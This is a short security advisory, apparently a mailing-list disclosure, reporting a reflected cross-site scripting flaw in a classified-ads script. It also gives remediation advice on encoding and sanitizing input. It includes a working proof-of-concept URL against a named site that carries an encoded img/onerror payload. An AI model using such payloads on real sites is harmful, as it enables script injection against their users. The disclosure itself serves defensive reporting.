*Vendor:
*
http://www.yourownclassifieds.com
*Description:
*
Your own classified software is a script that helps you creates your own
store.
*Discovered by: Rafay Baloch*
Vulnerability: Non persistent XSS
The script fails to sanitize the input that is entered into the text box
resulting into a XSS.
*POC*:
http://www.gumtreeclone.com/cat-search/for-sales-2/XSS
http://www.gumtreeclone.com/cat-search/for-sales-2/%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E
*Fix*:
- All input generated at any point inside the application should be html
encoded and filtered/sanitized before it's
copied to the application response.
- All html special characters should be replaced with it's corresponding
html entities.
--
Warm Regards,
Rafay Baloch
http://rafayhackingarticles.net
http://techlotips.com